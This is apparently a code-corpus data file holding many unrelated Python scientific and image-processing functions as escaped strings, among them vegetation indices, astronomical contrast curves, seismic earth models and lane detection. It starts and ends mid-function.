old_div((COAST - RE), (COAST + RE))\n wvnhfd = old_div((RE - COAST), (RE + COAST))\n\n ###SIs\n evi = old_div((2.5 * (NIR2 - R)), (NIR2 + 6 * R - 7.5 * B + 1))\n L = 0.5 # some coefficient for Soil Adjusted Vegetation Index (SAVI) DO NOT INCLUDE IN FEATURES\n savi = old_div(((1 + L) * (NIR2 - R)), (NIR2 + R + L))\n msavi = old_div((2 * NIR2 + 1 - ((2 * NIR2 + 1) ** 2 - 8 * (NIR2 - R)) ** 0.5), 2)\n bai = old_div(1.0, ((0.1 + R) ** 2 + 0.06 + NIR2))\n rgi = old_div(R, G)\n bri = old_div(B, R)\n\n rsi = np.stack(\n [arvi, dd, gi2, gndvi, ndre, ndvi, ndvi35, ndvi84, nirry, normnir, psri, rey, rvi, sa, vi1, vire, br, gr, rr,\n wvbi, wvnhfd, evi, savi, msavi, bai, rgi, bri],\n axis=2)\n\n return rsi", "def calculate_probabilities(self):\n all_probabilities = [self.calculate_insolation_probabilities(),\n self.calculate_soil_demand_probabilities(),\n self.calculate_soil_depth_probabilities(),\n self.calculate_water_demand_probabilities()]\n final_probabilities = Image(size=self.controller.image_height_map.size, dtype=np.float)\n reasons_for_not_growing = [0, 0, 0, 0]\n for y in range(self.controller.image_height_map.size):\n for x in range(self.controller.image_height_map.size):\n probability = 1.0\n for i in range(len(all_probabilities)):\n if all_probabilities[i][y][x] < probability:\n probability = all_probabilities[i][y][x]\n if probability == 0.0:\n reasons_for_not_growing[i] += 1\n final_probabilities.image[y][x] = probability\n location_factor_with_max_reasons_for_not_growing = 0\n for j in range(len(reasons_for_not_growing)):\n if j >= 2: # soil demand should be skipped because it is a obvious reason\n if reasons_for_not_growing[j] > reasons_for_not_growing[location_factor_with_max_reasons_for_not_growing]:\n location_factor_with_max_reasons_for_not_growing = j\n location_factors = [\"insolation\", \"soil demand\", \"soil depth\", \"water demand\"]\n print(\"Main reason for not growing (except soil demand): \" + location_factors[location_factor_with_max_reasons_for_not_growing])\n return 
final_probabilities", "def gasoilratio(pressure2, P_bubble, sg2, api, temp2, Rsb):\n import numpy as np\n Rs_array = []\n\n if pressure2 < P_bubble:\n # Using Vazquez and Beggs\n if api <=30:\n c1 = 0.0362\n c2 = 1.0937\n c3 = 25.7240\n if api > 30:\n c1 = 0.0178\n c2 = 1.187\n c3 = 23.9310\n Rs = (pressure2**c2) * c1 * sg2 * np.exp((c3 * api) / (temp2 + 459.67)) \n \n if pressure2 >= P_bubble:\n # Because Rs will be constant above BB\n Rs = Rsb\n \n return Rs", "def taucurveder(self, p, x):\n y = -(p[1] * numpy.exp((p[2] + x) / p[3]) / p[3] - p[4] * numpy.exp(-(p[5] + x) / p[6]) / p[6]) / (\n p[1] * numpy.exp((p[2] + x) / p[3]) +\n p[4] * numpy.exp(-(p[5] + x) / p[6])) ** 2.0\n # print 'dy: ', y\n return y", "def contrast_curve_core(\n star_data,\n plate_scale,\n fwhm=1,\n radius_size=None,\n center=None,\n):\n\n # make copy of data array\n data = star_data.copy()\n\n# data = np.abs(data) #DO NOT DO THIS!!!! It's making the standard deviation too small later.\n\n ################## establish center ########\n\n x, y = np.indices((data.shape))\n\n if type(center) == type(None):\n center = np.array(\n [(x.max() - x.min()) / 2.0, (y.max() - y.min()) / 2.0]\n )\n\n if type(radius_size) == type(None):\n radius_size = fwhm\n\n ########## set up radial coordinate system ########\n\n radii = np.sqrt((x - center[0]) ** 2 + (y - center[1]) ** 2)\n radii = radii.astype(np.int64)\n\n ones = np.ones_like(data)\n\n number_of_a = int(radii.max() / radius_size)\n\n pie_edges = np.arange(0, 390, 30)\n\n ######## set up aperture array ##########\n center_ap = CircularAperture([center[0], center[1]], radius_size)\n\n all_apers, all_apers_areas, all_masks = (\n [center_ap],\n [center_ap.area],\n [center_ap.to_mask(method=\"exact\")],\n )\n\n all_data, all_weights = [all_masks[0].multiply(data)], [\n all_masks[0].multiply(ones)\n ]\n\n all_stds = [twoD_weighted_std(all_data[0], all_weights[0])]\n\n ######## construct the apertures of the annuli #######\n sigma_clip = SigmaClip(sigma=3.0)\n bkgrms = StdBackgroundRMS(sigma_clip)\n\n medians = np.zeros((number_of_a, len(pie_edges) - 1))\n stds = np.zeros((number_of_a, len(pie_edges) - 1))\n seps = np.zeros(number_of_a)\n for j in range(int(number_of_a)):\n r_in = j * radius_size + fwhm\n r_out = j * radius_size + radius_size + fwhm\n seps[j] = (r_in+r_out)/2.*plate_scale\n\n # terminate if completely outside 10 arcseconds\n if (r_in * plate_scale) > 10:\n break\n\n # create aperture\n aper = CircularAnnulus(\n [center[0], center[1]],\n r_in=r_in,\n r_out=r_out,\n )\n\n # multiply the data by the aperture mask and store it\n all_apers.append(aper)\n all_apers_areas.append(aper.area)\n mask = aper.to_mask(method=\"exact\")\n all_masks.append(mask)\n mask_data = mask.multiply(data)\n\n mask_weight = mask.multiply(ones)\n\n for i, pie_edge_near in enumerate(pie_edges[:-1]):\n pie_edge_far = pie_edges[i + 1]\n mask_data_new = mask_data.copy()\n mask_data_new = check_boundaries(\n mask_data_new, pie_edge_near, pie_edge_far\n )\n medians[j, i] = np.nanmedian(mask_data_new)\n mask_data_masked = mask_data_new[~np.isnan(mask_data_new)]\n\n mean, std = meanclip(mask_data_masked, 3, converge_num=0.2)\n stds[j, i] = std\n\n #Return only the medians and stds for distances within the desired range\n seps = seps[0:j]\n medians = medians[0:j,:]\n stds = stds[0:j,:]\n return seps, medians, stds", "def glycolysis_rate_cal (self) :\n x = self.mitochondria.get_atp()\n y = self.mitochondria.get_adp()\n a = self.atp\n b = self.adp\n 
self.adp_to_atp(self.mitochondria.atp_translocase(math.ceil((x*b - a*y)/(a+b+x+y))))\n if a<1 :\n return\n else :\n self.set_glycolysis(int(5*b/a))", "def eady_growth_rate(data):\n N2 = ixr.brunt_vaisala(data)\n f = 2.0*omega*xruf.sin(xruf.deg2rad(data.lat))\n\n dz = ixr.domain.calculate_dz(data)\n du = ixr.domain.diff_pfull(data.ucomp, data)\n\n N = xruf.sqrt(N2.where(N2 > 0))\n\n egr = 0.31*du/dz*f/N\n return np.abs(egr)", "def _calpara(self):\n self.up = math.exp(self.sigma*math.sqrt(self.deltatime))\n self.down = math.exp(-self.sigma*math.sqrt(self.deltatime))\n self.upprob = (math.exp((self.r-self.d)*self.deltatime)-self.down)/(self.up-self.down)", "def P(lag):\n N = len(SP)\n ratios = SP[lag:N]/SP[0:N-lag]\n P = 100.*(ratios-1.)\n return P", "def rate_density(self, value):\n\n # TODO: analyse for certain that log units cancel out\n # with the change in occr\n\n if value.ndim == 2:\n value = value.T\n\n R_i = np.digitize(value[0], self._R_boundaries) - 1\n P_i = np.digitize(value[1], self._P_boundaries) - 1\n\n # Remove the ones out of bounds (oob_mask = out of bounds mask)\n oob_mask = np.zeros_like(R_i, dtype=bool)\n oob_mask = oob_mask | ((R_i < 0) | (R_i >= np.shape(self.occr)[0]))\n oob_mask = oob_mask | ((P_i < 0) | (P_i >= len(self._P_boundaries)-1))\n\n R_i = R_i[~oob_mask]\n P_i = P_i[~oob_mask]\n\n return self.occr[R_i] * self._cpf_grid[R_i, P_i]", "def pipeline(image,motorq):\n\n height = image.shape[0]\n width = image.shape[1]\n region_of_interest_vertices = [\n (0, height),\n (width / 2, 0),\n (width, height),\n ]\n blur = cv2.blur(image,(5,5))\n gray_image = cv2.cvtColor(blur, cv2.COLOR_RGB2GRAY)\n\n cannyed_image = cv2.Canny(gray_image, 100, 200)\n \n # cropped_image = region_of_interest(\n # cannyed_image,\n # np.array(\n # [region_of_interest_vertices],\n # np.int32\n # ),\n # )\n \n lines = cv2.HoughLinesP(\n cannyed_image,\n rho=6,\n theta=np.pi / 60,\n threshold=160,\n lines=np.array([]),\n minLineLength=40,\n maxLineGap=25\n )\n \n left_line_x = []\n left_line_y = []\n right_line_x = []\n right_line_y = []\n #print(lines)\n if not np.any(lines):\n return image\n \n for line in lines:\n for x1, y1, x2, y2 in line:\n #print line\n if (x2-x1) == 0:\n break\n slope = float(y2 - y1) / (x2 - x1)\n if math.fabs(slope) < 0.5:\n continue\n if slope <= 0:\n left_line_x.extend([x1, x2])\n left_line_y.extend([y1, y2])\n else:\n right_line_x.extend([x1, x2])\n right_line_y.extend([y1, y2])\n\n if len(left_line_x)==0 or len(right_line_x)==0:\n return image\n\n min_y = int(image.shape[0] * (3 / 5))\n max_y = int(image.shape[0])\n\n poly_left = np.poly1d(np.polyfit(\n left_line_y,\n left_line_x,\n deg=1\n ))\n \n left_x_start = int(poly_left(max_y))\n left_x_end = int(poly_left(min_y))\n \n poly_right = np.poly1d(np.polyfit(\n right_line_y,\n right_line_x,\n deg=1\n ))\n \n right_x_start = int(poly_right(max_y))\n right_x_end = int(poly_right(min_y))\n\n line_image = draw_lines(\n image,\n [[\n [left_x_start, max_y, left_x_end, min_y],\n [right_x_start, max_y, right_x_end, min_y],\n ]],\n thickness=5,\n )\n\n x_int = Intersect([left_x_start, max_y], [left_x_end, min_y], [right_x_start, max_y], [right_x_end, min_y])[0]\n #print(line_image.shape()[0])\n middle = line_image.shape[0]/2\n if x_int < middle-140:\n motorq.put( [ -13000 , 0 ] )\n elif x_int > middle+140:\n motorq.put( [ 0, -13000 ] )\n else:\n motorq.put( [ -13000, -13000 ] )\n\n \n\n\n return line_image", "def internal_rate_of_return(proforma):\n return np.irr(proforma['Yearly Net Value'].values)", "def 
photometric_calibration():\n pass", "def calculate_soil_depth_probabilities(self):\n soil_depth_probabilities = []\n for y in range(self.controller.image_height_map.size):\n print(\"Calculating soil depth probabilities: Row: \" + str(y))\n row = []\n for x in range(self.controller.image_height_map.size):\n available_soil_depth = self.controller.image_edaphic_map.image[y][x]\n needed_soil_depth = self.vegetation.soil_depth_demand\n if available_soil_depth < needed_soil_depth:\n probability = available_soil_depth / needed_soil_depth\n else:\n probability = 1.0\n row.append(probability)\n soil_depth_probabilities.append(row)\n return soil_depth_probabilities", "def tail_ratio(returns):\n\n return np.abs(np.percentile(returns, 95)) / \\\n np.abs(np.percentile(returns, 5))", "def relative_rate(self) -> \"double\":\n return _beamforming_swig.doaesprit_sptr_relative_rate(self)", "def get_dial_value(self, img):\n cimg = img.copy()\n cimg = cv2.medianBlur(cimg,5)\n mask = np.zeros_like(raw_img)\n radius = int(self.radius*0.6)\n mask = cv2.circle(mask,self.center,radius,(255,0,0),-1)\n mask = cv2.circle(mask,self.center,int(radius*0.2),(0,0,255),int(radius*0.5))\n cimg = cv2.bitwise_and(cimg, mask)\n edges = cv2.Canny(cimg,50,150,apertureSize = 3)\n minLineLength = int(radius*0.3)\n maxLineGap = 5\n lines = cv2.HoughLinesP(edges,1,np.pi/180,75,minLineLength,maxLineGap)\n if lines is not None:\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(cimg,(x1,y1),(x2,y2),(255,255,0),1)\n return cimg", "def calculateUSky(self):\n skyline = []\n for p in self.pruned:\n pastart = [self.drange[0] for i in range(self.dim)]\n pamax = p.getLocationMax()\n pdom = list(self.index.intersection(tuple(pastart+pamax),objects=True))\n if len(pdom) == 1 and pdom[0].object == p:\n skyline.append([p, 1.0])\n else:\n finalp = 0.0\n for i in range(p.getPCount()):\n base = p.getProb(i)\n loc = p.getLocation(i)\n intersec = list(self.index.intersection(tuple(pastart+loc),objects=True))\n for d in intersec:\n dobj = d.object\n if dobj != p:\n tprob = 0.0\n for idx in range(dobj.getPCount()):\n if dominateStat(dobj.getLocation(idx),loc) == True:\n tprob += dobj.getProb(idx)\n tprob = 1.0 - tprob\n base *= tprob\n finalp += base\n skyline.append([p, finalp])\n for p in skyline:\n print(p[0])\n print(p[1])\n print(\"\")\n # print(skyline)", "def breakdown_prob(self):\n if self.age <= 1:\n return self._breakdown_ratio + (self.breakdowns*self._broken_before)\n else:\n return ((self.age*self._breakdown_ratio) +\n (self.breakdowns*self._broken_before))", "def __CalculatePerimeter(self, curve):\r\n return cv2.arcLength(curve, True)", "def recompute_exit_pupil(self):\r\n\r\n rearZ = self.rear_z()\r\n if rearZ <= 0.0:\r\n print('Not focus')\r\n rearRadius = self.rear_aperture()\r\n samples = 1024 * 1024\r\n half = 2.0 * rearRadius\r\n proj_bmin, proj_bmax = ti.Vector([-half, -half]), ti.Vector([half, half])\r\n for i in range(pupil_interval_count):\r\n r0 = ti.cast(i, ti.f32) / pupil_interval_count * self.film_diagnal / 2.0\r\n r1 = ti.cast(i + 1, ti.f32) / pupil_interval_count * self.film_diagnal / 2.0\r\n bmin, bmax = make_bound2()\r\n count = 0\r\n for j in range(samples):\r\n u, v= ti.random(), ti.random()\r\n film_pos = ti.Vector([lerp(ti.cast(j, ti.f32)/samples, r0, r1), 0.0, 0.0])\r\n x, y = lerp(u, -half, half), lerp(v, -half, half)\r\n lens_pos = ti.Vector([x, y, rearZ])\r\n if inside_aabb(bmin, bmax, ti.Vector([x, y])):\r\n ti.atomic_add(count, 1)\r\n else:\r\n ok, _, _ = self.gen_ray_from_film(film_pos, (lens_pos - 
film_pos).normalized())\r\n if ok:\r\n bmin, bmax = bound_union_with(bmin,bmax, ti.Vector([x, y]))\r\n ti.atomic_add(count, 1)\r\n\r\n if count == 0:\r\n bmin, bmax = proj_bmin, proj_bmax\r\n\r\n # extents pupil bound\r\n delta = 2 * (proj_bmax - proj_bmin).norm() / ti.sqrt(samples)\r\n bmin -= delta\r\n bmax += delta\r\n\r\n self.exitPupilBoundMin[i] = bmin\r\n self.exitPupilBoundMax[i] = bmax", "def compute_energy(img):\r\n # urmati urmatorii pasi:\r\n # 1. transformati imagine in grayscale\r\n # 2. folositi filtru sobel pentru a calcula gradientul in directia X si Y\r\n # 3. calculati magnitudinea imaginii\r\n\r\n img_gray_scale = cv.cvtColor(img, cv.COLOR_BGR2GRAY);\r\n\r\n #de cautat totusi si codul pt SOBEL pe net\r\n grad_x = cv.Sobel(img_gray_scale, ddepth = cv.CV_16S, dx = 1, dy = 0, borderType = cv.BORDER_CONSTANT)\r\n grad_y = cv.Sobel(img_gray_scale, ddepth = cv.CV_16S, dx = 0, dy = 1, borderType = cv.BORDER_CONSTANT)\r\n\r\n#E repr gradientii aka cat se sch un pixel de la unul la altul\r\n E = abs(grad_x) + abs(grad_y)\r\n # print(grad_y)\r\n # print(grad_x)\r\n\r\n cv.imwrite(\"poza.jpg\", E)\r\n return E", "def R(self):\n\t\treturn (arange(self.rbins) + 0.5) * (self.cbins - 0.5) / self.rbins", "def getRatio(probe_num, position_vector, shot_range, dir, day ='050119r'):\n ratio_x = 0\n ratio_y = 0\n ratio_z = 0\n # helm_B = [0,0,0]\n divideby = 0\n for shot in range(shot_range[0], shot_range[1]+1):\n print( 'On shot ', day+str(shot), ' for probe ',probe_num)\n x,y,z, currmax,helmB_new = probe_calib(day+str(shot), probe_num, position_vector,dir)\n ratio_x = ratio_x + x\n ratio_y = ratio_y + y\n ratio_z = ratio_z + z\n # helm_B = [helm_B[i] + helmB_new[i] for i in len(helmB)]\n divideby = divideby + 1 #averaging over the number of shots\n ratio_Bx = ratio_x/divideby\n ratio_By = ratio_y/divideby\n ratio_Bz = ratio_z/divideby\n # helmB = [helm_B]/divideby\n # print ratio_Bx, ratio_By, ratio_Bz, helmB\n # print(\"ratio_Bx %f, ratio_By %f, ratio_Bz %f, helmB%s\"%(ratio_Bx, ratio_By, ratio_Bz, helmB))\n Bx_sqr =ratio_x**2\n By_sqr =ratio_y**2\n Bz_sqr =ratio_z**2\n B = Bx_sqr + By_sqr+ Bz_sqr\n norm_factor = np.sqrt(B)\n ratio_Bx, ratio_By, ratio_Bz = [ratio_Bx, ratio_By, ratio_Bz]/norm_factor\n\n return (ratio_Bx, ratio_By, ratio_Bz, norm_factor)", "def compute(self, Rs, D):\n self.Rs = Rs\n self.D = D\n self.M = (self.Rs * c**2 * au) / (2 * G * M_sun)\n print(\"M = %.1e M☉\\t%.2e Kg\" % (self.M, self.M*M_sun))\n print(\"Rs = %s ua\\t%.2e m\" % (self.Rs, self.Rs*au))\n print(\"D = %s ua\\t%.2e m\\n\" % (self.D, self.D*au))\n\n vrai_debut = time.process_time()\n\n\n seen_angle, deviated_angle = self.trajectories()\n\n self.interpolation = self.interpolate(seen_angle, deviated_angle)\n\n if self.display_interpolation is True:\n xmin = np.min(seen_angle)\n xmax = np.max(seen_angle)\n seen_angle_splin = np.linspace(xmin, xmax, 20001)\n deviated_angle_splin = self.interpolation(seen_angle_splin)\n plt.figure('Trajectories interpolation')\n plt.clf()\n plt.title(\"Light deviation interpolation\", va='bottom')\n plt.xlabel('seen angle(°)')\n plt.ylabel('deviated angle(°)')\n plt.plot(seen_angle, deviated_angle, 'o')\n plt.plot(seen_angle_splin, deviated_angle_splin)\n plt.grid()\n #plt.savefig('interpolation.png', dpi=250, bbox_inches='tight')\n plt.draw()\n#\n print(\"last angle\", seen_angle[-1])\n print(\"trajectories time: %.1f\" % (time.process_time()-vrai_debut))\n\n img_matrix_x, img_matrix_y = self.create_matrices()\n\n self.img_matrix_x = img_matrix_x\n self.img_matrix_y = 
img_matrix_y\n\n self.img2 = self.img_pixels(self.img_debut)\n\n vrai_fin = time.process_time()\n print(\"\\nglobal computing time: %.1f\\n\" % (vrai_fin-vrai_debut))", "def ventilation_rate(self):\n # TODO: calculate based on MERV ratings/efficiency/power/etc.\n return (\n sum(v.calculate_ach(self.volume) for v in self.air_quality_measures)\n + self.outdoor_air_ventilation\n )", "def get_ppm(self):\n return self.PARA * math.pow((self.get_resistance()/ self.RZERO), -self.PARB)", "def get_ppm(self):\n return self.PARA * math.pow((self.get_resistance()/ self.RZERO), -self.PARB)", "def pulley(image):\n kernel = np.ones((3, 3), np.uint8)\n image = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernel, iterations=3)\n # image = cv2.medianBlur(image, 15)\n x, y = circular_detector(image, 25, 30)\n\n return x, y", "def contrast_curve_main(data, fwhm, instrument, position=None):\n # assign plate scale\n plate_scale_dict = {\"PHARO\": 0.025, \"ShARCS\": 0.0333}\n\n plate_scale = plate_scale_dict[instrument]\n\n #set radius_size so that radius is no larger than 1\"\n radius_size = np.min([1./plate_scale, fwhm])\n\n#DO NOT TAKE ABSOLUTE VALUE!\n contrast_result = contrast_curve_core(\n data, plate_scale, fwhm=fwhm, radius_size=radius_size, center=position\n )\n separation = contrast_result[0]\n means = contrast_result[1]\n stds = contrast_result[2]\n\n center_flux = run_ap_phot(data, fwhm, position=position)\n\n # intiialize the \"fake im fluxes\" with the central aperture flux.\n all_seps = [0]\n fake_im_fluxes = [center_flux[0]]\n fake_im_stds = [center_flux[1]]\n\n fake_ims = []\n\n for i, (all_mean, all_std) in enumerate(zip(means, stds)):\n # initialize fake fluxes for a given annulus\n fake_im_fluxes_an = []\n n_annuli = 12\n for j in range(n_annuli):\n mean = all_mean[j]\n std = all_std[j]\n x, y = np.meshgrid(np.arange(-1000, 1000), np.arange(-1000, 1000)) #was 100x100; CDD made larger for poor FWHMs\n dst = np.sqrt(x * x + y * y)\n\n # Initializing sigma and muu: size of fake injected source\n sigma = fwhm\n muu = 0.0\n\n bg_std = std\n\n noise_image = make_noise_image(\n (2000, 2000), distribution=\"gaussian\", mean=mean, stddev=bg_std\n ) #Was 200x200, but that's too small for some images because the sky annulus falls outside the fake image for high FWHM.\n # Calculating Gaussian array. 
tuned to a total STD=5\n fake = (\n 7 * std * np.exp(-((dst - muu) ** 2 / (2.0 * sigma**2)))\n + noise_image\n + 3\n )\n\n flux, err = run_ap_phot(fake, fwhm)\n\n # rescale to a full std of 5\n fixscale = (flux / err) / 5\n\n flux = flux / fixscale\n fake_im_fluxes_an += [flux]\n fake_im_fluxes += [np.nanmedian(fake_im_fluxes_an)]\n fake_im_stds += [np.nanstd(fake_im_fluxes_an)]\n all_seps += [separation[i]]\n\n fake_im_fluxes = np.array(fake_im_fluxes)\n\n err = 2.5 * np.log10(1.0 + (fake_im_stds / fake_im_fluxes))\n\n#DELETE THIS\n# indices = np.arange(len(fake_im_fluxes))\n# separation = fwhm * plate_scale * indices\n\n contrast = -2.5 * np.log10(fake_im_fluxes / center_flux[0])\n\n #Save contrast curve as a pandas DataFrame\n df = pd.DataFrame({'arcsec': all_seps, 'dmag': contrast, 'dmrms': err})\n\n return df #separation, contrast, err", "def calculate_soil_demand_probabilities(self):\n soil_damand_probabilities = []\n for y in range(self.controller.image_height_map.size):\n print(\"Calculating soil demand probabilities: Row: \" + str(y))\n row = []\n for x in range(self.controller.image_height_map.size):\n if self.vegetation.soil_demand.id == self.controller.soil_ids_map.image[y][x]:\n probability = 1.0\n else:\n probability = 0.0\n row.append(probability)\n soil_damand_probabilities.append(row)\n return soil_damand_probabilities", "def rain_approximation(\n pr: xr.DataArray,\n tas: xr.DataArray,\n thresh: str = \"0 degC\",\n method: str = \"binary\",\n):\n prlp = pr - snowfall_approximation(pr, tas, thresh=thresh, method=method)\n prlp.attrs[\"units\"] = pr.attrs[\"units\"]\n return prlp", "def _eventRs(self, phi, u):\n with np.errstate(all='ignore'):\n return 1/u[0] - self.Rs", "def R_P(take_off_angle, strike, dip, rake, az):\n inc = np.deg2rad(take_off_angle)\n SR = Fault_geom_SR(dip, rake)\n QR = Fault_geom_QR(strike, dip, rake, az)\n PR = Fault_geom_PR(strike, dip, rake, az)\n\n RP = SR * (3 * np.cos(inc) ** 2 - 1) - QR * np.sin(2 * inc) - PR * np.sin(inc) ** 2\n return RP", "def epi_curve(max,peakedness):\n if peakedness != 5:\n alpha_beta = [(7,5),(13,2.5),(21,1.5),(31,1),(68,0.45),(7,10),(13,5),(21,3),(31,2),(68,0.9),(7,15),(13,7.5),(21,4.5),(31,3),(68,1.35)]\n if max == 30:\n i = peakedness\n elif max == 60:\n i = peakedness + 5\n elif max == 90:\n i = peakedness + 10\n alpha = float(alpha_beta[i][0])\n beta = float(alpha_beta[i][1])\n return gamma_pdf(alpha,beta)\n elif peakedness == 5:\n return MIDAS", "def compute_miss_rate(miss_rates, fppis, fppi_level=0.1):\n\n position = bisect(fppis, fppi_level)\n position1 = position - 1\n position2 = position if position < len(miss_rates) else position1\n return 0.5 * (miss_rates[position1] + miss_rates[position2])", "def imagetestplt(thetainput,doubleopponencyinput):\n theta = thetainput\n rgcMode = doubleopponencyinput\n\n\n C = retina.sample(img,x,y,coeff[i],loc[i],rgb=True) # CENTRE(sharp retina)\n S = retina.sample(img,x,y,dcoeff[i],dloc[i],rgb=True) # SURROUND(blurred retina)\n \n if rgcMode == 0:\n pV,nV = rgc.opponency(C,S,theta)\n else:\n pV,nV = rgc.doubleopponency(C,S,theta)\n\n rIntensity,cIntensity = showNonOpponency(C,theta)\n # Construct window plots\n plt.subplot(3,1,1), plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)), plt.title('Original test image')\n plt.xticks([]), plt.yticks([])\n plt.subplot(3,1,2), plt.imshow(cv2.cvtColor(rIntensity, cv2.COLOR_BGR2RGB)), plt.title('Backprojected R+G Intensity Response')\n plt.xticks([]), plt.yticks([])\n plt.subplot(3,1,3), plt.imshow(cv2.cvtColor(cIntensity, 
cv2.COLOR_BGR2RGB)), plt.title('Cortical R+G Intensity Response')\n plt.xticks([]), plt.yticks([])\n # format float to string\n thetastring = \"%.2f\" % theta\n plt.suptitle('Rectified DoG Intensity Images. Threshold:' + thetastring, fontsize=16)\n plt.show()\n\n #Generate backprojected images\n if showInverse:\n rOpponent = showBPImg(pV,nV)\n plt.imshow(cv2.cvtColor(rOpponent, cv2.COLOR_BGR2RGB)), plt.title('Backprojected Opponent Cells Output')\n plt.xticks([]), plt.yticks([])\n plt.show()\n # Cortex\n if showCortex:\n cOpponent = showCortexImg(pV,nV)\n plt.imshow(cv2.cvtColor(cOpponent, cv2.COLOR_BGR2RGB)), plt.title('Cortex Opponent Cells Output')\n plt.xticks([]), plt.yticks([])\n plt.show()", "def area(r):\n return np.pi * (r ** 2)", "def calculate_insolation_probabilities(self):\n insolation_probabilities = []\n for y in range(self.controller.image_height_map.size):\n print(\"Calculating insolation probabilities: Row: \" + str(y))\n row = []\n for x in range(self.controller.image_height_map.size):\n available_calories = self.controller.image_insolation_map.image[y][x]\n needed_calories = self.vegetation.energy_demand\n probability = self.calculate_probability(needed_calories, available_calories)\n row.append(probability)\n insolation_probabilities.append(row)\n return insolation_probabilities", "def _residual_edp(self, params):\n data = self.F**2\n model = np.absolute(self._model())**2\n sigma = self.sigma\n return (data[self.mask]-model[self.mask]) / sigma[self.mask] \n \n # The following three lines do not reproduce Sun's results, which proves\n # that the fits were done through intensity, not form factor.\n #data = self.F\n #model = np.absolute(self._model())\n #return (data - model) ", "def stretch_factor(self):\n p = self._pants_decomposition\n\n # pick a curve to iterate\n c = PantsLamination.random(p)\n # print(c)\n\n cc = (self**100) * c\n # print(self**100)\n # print(cc)\n return float(sum(abs(x) for x in (self*cc).to_vector())) / \\\n sum(abs(x) for x in cc.to_vector())", "def model_prem_iso(r):\n\n\t#- normalised radius\n\tx = r / 6371000.0\n\n\t#- march through the various depth levels -----------------------------------------------------\n\n\t#- upper crust\n\tif (r >= 6356000.0):\n\t\trho = 2.6\n\t\tvpv = 5.8\n\t\tvph = vpv\n\t\tvsv = 3.2\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- lower crust\n\telif (r >= 6346000.6) & (r < 6356000.0):\n\t\trho = 2.9\n\t\tvpv = 6.8\n\t\tvph = vpv\n\t\tvsv = 3.9\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- LID\n\telif (r >= 6291000.0) & (r < 6346000.6):\n\t\trho = 2.6910 + 0.6924 * x\n\t\tvpv = 4.1875 + 3.9382 * x\n\t\tvph = vpv\n\t\tvsv = 2.1519 + 2.3481 * x\n\t\tvsh = vsv\n\t\teta = 3.3687 - 2.4778 * x\n\n\t#- LVZ\n\telif (r >= 6151000.0) & (r < 6291000.0):\n\t\trho = 2.6910 + 0.6924 * x\n\t\tvpv = 4.1875 + 3.9382 * x\n\t\tvph = vpv\n\t\tvsv = 2.1519 + 2.3481 * x\n\t\tvsh = vsv\n\t\teta = 3.3687 - 2.4778 * x\n\n\t#- Transition zone 1\n\telif (r >= 5971000.0) & (r < 6151000.0):\n\t\trho = 7.1089 - 3.8045 * x\n\t\tvpv = 20.3926 - 12.2569 * x\n\t\tvph = vpv\n\t\tvsv = 8.9496 - 4.4597 * x\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Transition zone 2\n\telif (r >= 5771000.0) & (r < 5971000.0):\n\t\trho = 11.2494 - 8.0298 * x\n\t\tvpv = 39.7027 - 32.6166 * x\n\t\tvph = vpv\n\t\tvsv = 22.3512 - 18.5856 * x\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Transition zone 3\n\telif (r >= 5701000.0) & (r < 5771000.0):\n\t\trho = 5.3197 - 1.4836 * x\n\t\tvpv = 19.0957 - 9.8672 * x\n\t\tvph = vpv\n\t\tvsv = 9.9839 - 4.9324 * x\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Lower 
mantle 1\n\telif (r >= 5600000.0) & (r < 5701000.0):\n\t\trho = 7.9565 - 6.4761 * x + 5.5283 * x**2 - 3.0807 * x**3\n\t\tvpv = 29.2766 - 23.6027 * x + 5.5242 * x**2 - 2.5514 * x**3\n\t\tvph = vpv\n\t\tvsv = 22.3459 - 17.2473 * x - 2.0834 * x**2 + 0.9783 * x**3\n\t\tvsh = vsv\n\t\teta = 1.0 \n\n\t#- Lower mantle 2\n\telif (r >= 3630000.0) & (r < 5600000.0):\n\t\trho = 7.9565 - 6.4761 * x + 5.5283 * x**2 - 3.0807 * x**3\n\t\tvpv = 24.9520 - 40.4673 * x + 51.4832 * x**2 - 26.6419 * x**3\n\t\tvph = vpv\n\t\tvsv = 11.1671 - 13.7818 * x + 17.4575 * x**2 - 9.2777 * x**3\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Lower mantle 3\n\telif (r >= 3480000.0) & (r < 3630000.0):\n\t\trho = 7.9565 - 6.4761 * x + 5.5283 * x**2 - 3.0807 * x**3\n\t\tvpv = 15.3891 - 5.3181 * x + 5.5242 * x**2 - 2.5514 * x**3\n\t\tvph = vpv\n\t\tvsv = 6.9254 + 1.4672 * x - 2.0834 * x**2 + 0.9783 * x**3\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Outer core\n\telif (r >= 1221000.5) & (r < 3480000.0):\n\t\trho = 12.5815 - 1.2638 * x - 3.6426 * x**2 - 5.5281 * x**3\n\t\tvpv = 11.0487 - 4.0362 * x + 4.8023 * x**2 - 13.5732 * x**3\n\t\tvph = vpv\n\t\tvsv = 0.0\n\t\tvsh = 0.0\n\t\teta = 1.0\n\n\t#- Inner Core\n\telif (r >= 0.0) & (r < 1221000.5):\n\t\trho = 13.0885 - 8.8381 * x**2\n\t\tvpv = 11.2622 - 6.3640 * x**2\n\t\tvph = vpv\n\t\tvsv = 3.6678 - 4.4475 * x**2\n\t\tvsh = vsv\n\t\teta = 1.0 \n\n\t#- convert to elastic parameters --------------------------------------------------------------\n\n\trho = 1000.0 * rho\n\tvpv = 1000.0 * vpv\n\tvph = 1000.0 * vph\n\tvsv = 1000.0 * vsv\n\tvsh = 1000.0 * vsh\n\n\tA = rho * vph**2\n\tC = rho * vpv**2\n\tN = rho * vsh**2\n\tL = rho * vsv**2\n\tF = eta * (A - 2 * L)\n\n\treturn rho, A, C, F, L, N", "def get_params(I, Stokes, imgs_polar, k, rho_one, equal_i):\n\n AOP = (0.5 * np.arctan2(Stokes[2], Stokes[1]) + np.pi / 2) / np.pi * 255\n #phi = 0.5 * np.arctan2(Stokes[2], Stokes[1])\n DOP = np.zeros((I.shape[1], I.shape[2]))#, dtype=int)\n #rho = np.zeros((I.shape[1], 